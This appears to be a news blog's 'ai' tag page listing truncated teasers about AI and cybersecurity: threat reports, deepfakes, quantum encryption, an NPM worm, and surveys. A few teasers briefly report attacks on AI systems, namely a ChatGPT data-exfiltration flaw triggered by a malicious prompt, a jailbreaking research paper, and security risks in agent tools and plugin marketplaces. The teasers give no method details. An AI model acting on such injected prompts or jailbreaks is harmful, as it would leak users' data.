ai (147)

31133357090?profile=RESIZE_400xSonicWall has launched its 2026 Cyber Protect Report, marking a significant shift in how the organization presents threat intelligence.  Rather than focusing solely on raw data, the report prioritizes protection outcomes for business leaders.  The findings indicate that while the volume of attacks remains high, adversaries are becoming more precise, with medium and high-severity incidents rising by over 20% to reach 13 billion hits.

One of the most significant findings in the 2026 report is the

31134067883?profile=RESIZE_400xThe idea that artificial intelligence might one day rival human creativity has become a familiar theme in public conversation. Generative models can rapidly produce images, stories and designs, which makes it tempting to assume that they possess something like imagination. A new study published in Advanced Science challenges that assumption in a direct and illuminating way. By examining how humans and AI generate images from abstract prompts, the researchers show that what looks like creativity

31134067852?profile=RESIZE_400xSenior business leaders in the UK are experiencing a significant rise in job complexity, with artificial intelligence (AI) identified as a primary driver.  A study by Alliance Manchester Business School (AMBS), based on a Censuswide survey of 500 UK managers, directors, and C-suite executives, reveals that almost three quarters (73%) of senior management have found their roles more complex since 2020 because of AI.  This figure climbs to 79% among directors and C-suite personnel, and 82% among m

31133356696?profile=RESIZE_400xUsers frequently entrust AI assistants with highly sensitive information, including medical records, financial documents, and proprietary business code.  Check Point researchers have disclosed a critical vulnerability in ChatGPT's architecture that enables attackers to extract user data covertly.  A flaw in ChatGPT's code execution environment demonstrated how a single malicious prompt could quietly exfiltrate sensitive user data without warning or user approval.[1]

The Vulnerability - OpenAI de

31133346653?profile=RESIZE_400xIf there's one thing that AI is good at, particularly language models, it's detecting patterns in datasets so large that it would be practically impossible for humans to sift through them all, quickly and accurately.  That certainly seems to be the case with Anthropic's new general-purpose model, Claude Mythos, as the company has announced that it used it to detect "thousands of high-severity vulnerabilities, including some in every major operating system and web browser."

Alongside the launch o

31130726490?profile=RESIZE_400xOn 28 February 2026, a joint US-Israeli military campaign struck Iranian nuclear facilities, military infrastructure, and leadership targets in what was officially called Operation Epic Fury.  Social media quickly flooded with false footage of the conflict, including massive explosions in Tel Aviv, successful Iranian missile strikes on US warships, and satellite imagery purporting to show damage to American military bases in the Gulf. 

Some of this footage was recycled from unrelated conflicts,

31129007288?profile=RESIZE_400xIf you've been using OpenClaw, the wildly popular AI agentic tool that took the developer community by storm, you should probably update it if you haven't done so already.  OpenClaw, as was reported in the past, has widely known security problems.  From the beginning, OpenClaw creator Peter Steinberger has warned potential users on GitHub that "There is no 'perfectly secure' setup."  Users can grant OpenClaw control over their devices and access to specific apps, local files, and logged-in accou

31127144678?profile=RESIZE_400xRebranded as TrendAI, Trend Micro has published findings from a global study of 3,700 business and IT decision makers showing that 67% felt pressured to approve artificial intelligence projects despite security concerns.  One in seven described those concerns as extreme, yet overrode them to match competitors and meet internal demands.

Chief Platform and Business Officer and Head of TrendAI, Rachel Jin, commented: “Organizations are not lacking awareness of risk; they’re lacking the conditions t

31105056077?profile=RESIZE_400xEvery time you check your bank balance online, send an email, or make a purchase with a credit card, your information is encrypted, a mathematical shield that keeps your data protected from prying eyes.  This encryption has worked extremely well for decades.  The algorithms safeguarding your most sensitive data would take today’s most powerful traditional computers millions of years to crack.  However, a new type of machine is emerging that could change everything.  That machine is the quantum c

31101743099?profile=RESIZE_400xSecurity researchers have uncovered a new supply chain attack targeting the NPM registry with malicious code that exhibits worm-like propagation capabilities.  Named Sandworm_Mode, the attack was deployed through 19 packages published under two aliases, which relied on typo squatting to trick developers into executing the malicious code.  According to cybersecurity firm Socket, the attack bears the hallmarks of the Shai-Hulud campaign that hit roughly 800 NPM packages in September and November 2

31101632083?profile=RESIZE_400xArtificial intelligence is becoming woven into the fabric of daily life, from helping doctors summarize medical notes to assisting developers with complex code.  As these systems move from novelty to infrastructure, the central question is no longer what they can do, but what happens when they are pushed to do what they should not.  A recent research paper titled Jailbreaking the Matrix: Nullspace Steering for Controlled Model Subversion and a companion article from TechXplore explore this quest

31095042494?profile=RESIZE_400xDrones have emerged as a significant security concern for US military bases and critical infrastructure.  These unmanned systems are typically low-cost, simple to operate, and difficult to detect using traditional air-defense sensors.  A single drone can be deployed for surveillance, smuggling, or disruption, creating a scenario where security forces must respond swiftly without overreacting.  To address this challenge, the US Army is adopting a new counter-drone platform known as DroneArmor.  D

31095045100?profile=RESIZE_400xIn the 1980’s the rock group The Who, had a hit song: ‘Who are You.”  That was rock’n’roll, but what is happening now is a question of, “Is it Real, or is it Fake?”  Who are You?  In modern digital enterprises, the fastest-growing identity population is no longer human users; it is machine identity.  APIs, microservices, containers, cloud workloads, CI/CD pipelines, robotic process automation, and AI agents all authenticate using identities.  Each relies on credentials such as keys, certificates

31092986301?profile=RESIZE_400xThe past few years have brought an extraordinary shift in how digital content is created. Videos and images that once required studios, actors, and expensive equipment can now be produced by generative deep learning models that run on a laptop.  These systems can fabricate a person’s face, voice, and gestures with such precision that the results often look indistinguishable from real footage. This technological leap has opened remarkable creative possibilities, yet it has also created a new kind

31091308455?profile=RESIZE_400xQuorum Cyber has published its 2026 Global Cyber Risk Outlook report[1], detailing a significant evolution in cyber threats driven by Artificial Intelligence (AI) and Ransomware-as-a-Service (RaaS) platforms.  The analysis, based on incidents across more than 350 organizations worldwide in 2025, indicates that cybercrime has entered a more industrialized phase.  This development allows even poorly skilled attackers to launch sophisticated operations, with nation-state actors automating up to 90%

31079368283?profile=RESIZE_400xSentinel Labs has provided a keen look into LLMs and SOC operations.  For security teams, AI promised to write secure code, identify and patch vulnerabilities, and replace monotonous security operations tasks.  Its key value proposition was raising costs for adversaries while lowering them for defenders.

To evaluate whether Large Language Models (LLMs) were both sufficiently performant and reliable to be deployed in the enterprise, a wave of new benchmarks was created.  In 2023, these early benc

31059799684?profile=RESIZE_400xAI coding assistants are no longer just autocompleting lines of code, they are quietly making decisions for you.  Tools like Claude Code are able to read projects, plan multi-step changes, install dependencies, and modify files with minimal human oversight.  To make this possible, these assistants rely on plugin marketplaces, where third-party developers can enable ‘skills’ that teach the agent how to manage infrastructure, testing, and dependencies.  Though powerful, the model requires a high d

31052163291?profile=RESIZE_400xAs the digital landscape continues to evolve, so too do the threats that organizations must contend with.  In this year's final Reporter's Notebook conversation, cybersecurity experts Rob Wright from Dark Reading, David Jones from Cybersecurity Dive, and Alissa Irei from Tech Target Search Security share their insights on what the future holds for cybersecurity in 2026.  Drawing from AI-summarized industry reports and expert opinions, the conversation highlights key trends, challenges, and oppor

31040441252?profile=RESIZE_400xAs the digital landscape evolves, 2026 is shaping up to be a turning point for cybersecurity. AI, quantum computing and increasingly sophisticated threat actors are reshaping how both businesses and individuals think about digital risks.  Based on Vytautas Kaziukonis, a Forbes Councils Member and his experience as a founder and CEO in the cybersecurity space, he shares his views into three major cybersecurity trends shaping 2026 and what they mean for companies and users alike.[1]

  1. AI stays in

31043722452?profile=RESIZE_400xCybersecurity researchers at ESET have uncovered a troubling new trend in cybercrime: hackers are now using AI-generated malware to intercept payments made through Near Field Communication (NFC)-enabled devices.  This advanced malware is capable of relaying sensitive payment card data, carrying out fraudulent online purchases, and even enabling unauthorized withdrawals from Automated Teller Machines (ATMs).  The discovery highlights how cybercriminals are rapidly adopting artificial intelligence